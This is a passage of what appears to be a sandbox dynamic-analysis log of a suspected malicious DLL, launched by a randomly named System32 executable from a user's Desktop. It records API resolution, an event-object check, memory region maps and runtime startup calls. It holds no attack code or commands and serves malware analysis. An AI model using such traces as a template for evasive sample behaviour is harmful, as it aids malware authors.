GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.502] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.502] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.502] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.502] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.502] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.502] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.502] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.502] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.502] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.502] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.502] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.502] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.502] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.502] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.502] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.502] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.502] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.502] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.503] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.503] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.503] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.503] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.503] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.503] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.503] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.503] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.503] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.503] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.503] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.503] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.503] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.503] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.503] AddAtomS () returned 0x0 [0033.505] HeapDestroy (hHeap=0x4b0000) returned 1 Process: id = "35" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fae0" os_pid = "0xc08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"DefaultInstall\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1599 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1600 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1601 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1602 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1603 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1604 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1605 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1606 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1607 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1608 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1609 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1610 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1611 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1612 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1613 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1614 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1615 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1616 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1617 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1618 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1619 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1620 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1621 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1622 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1623 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1624 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1625 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1626 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1627 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1628 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1629 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1630 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1631 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1632 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1633 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1634 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1635 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1636 start_va = 0x1200000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1637 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1638 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1639 start_va = 0x1380000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Thread: id = 76 os_tid = 0xc0c [0033.549] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef58c | out: lpSystemTimeAsFileTime=0x1ef58c*(dwLowDateTime=0xe1ae54b0, dwHighDateTime=0x1d3dfba)) [0033.549] GetCurrentProcessId () returned 0xc08 [0033.549] GetCurrentThreadId () returned 0xc0c [0033.549] GetTickCount () returned 0x1785a [0033.549] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef584 | out: lpPerformanceCount=0x1ef584*=367722851) returned 1 [0033.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.550] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.550] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.550] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.550] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.550] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.551] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.551] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.551] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.551] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.551] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.551] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.552] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.552] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.552] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.552] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.552] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.552] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.552] GetCurrentThreadId () returned 0xc0c [0033.552] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"DefaultInstall\"" [0033.552] GetEnvironmentStringsW () returned 0x2b7900* [0033.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13709f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.553] FreeEnvironmentStringsW (penv=0x2b7900) returned 1 [0033.553] GetStartupInfoA (in: lpStartupInfo=0x1ef4dc | out: lpStartupInfo=0x1ef4dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.553] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.553] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.553] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.553] SetHandleCount (uNumber=0x20) returned 0x20 [0033.553] GetLastError () returned 0x0 [0033.553] SetLastError (dwErrCode=0x0) [0033.553] GetLastError () returned 0x0 [0033.553] SetLastError (dwErrCode=0x0) [0033.553] GetLastError () returned 0x0 [0033.553] SetLastError (dwErrCode=0x0) [0033.553] GetACP () returned 0x4e4 [0033.553] GetLastError () returned 0x0 [0033.553] SetLastError (dwErrCode=0x0) [0033.553] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.553] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef4bc | out: lpCPInfo=0x1ef4bc) returned 1 [0033.553] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1eef88 | out: lpCPInfo=0x1eef88) returned 1 [0033.553] GetLastError () returned 0x0 [0033.553] SetLastError (dwErrCode=0x0) [0033.553] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1eef18 | out: lpCharType=0x1eef18) returned 1 [0033.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef39c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef39c, cbMultiByte=256, lpWideCharStr=0x1eed08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0033.553] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x1eef9c | out: lpCharType=0x1eef9c) returned 1 [0033.553] GetLastError () returned 0x0 [0033.553] SetLastError (dwErrCode=0x0) [0033.553] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef39c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef39c, cbMultiByte=256, lpWideCharStr=0x1eecd8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.553] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.554] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1eeac8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.554] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1ef29c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x17^\x9côÔô\x1e", lpUsedDefaultChar=0x0) returned 256 [0033.554] GetLastError () returned 0x0 [0033.554] SetLastError (dwErrCode=0x0) [0033.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef39c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef39c, cbMultiByte=256, lpWideCharStr=0x1eecf8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.554] LCMapStringW (in: Locale=0x0, 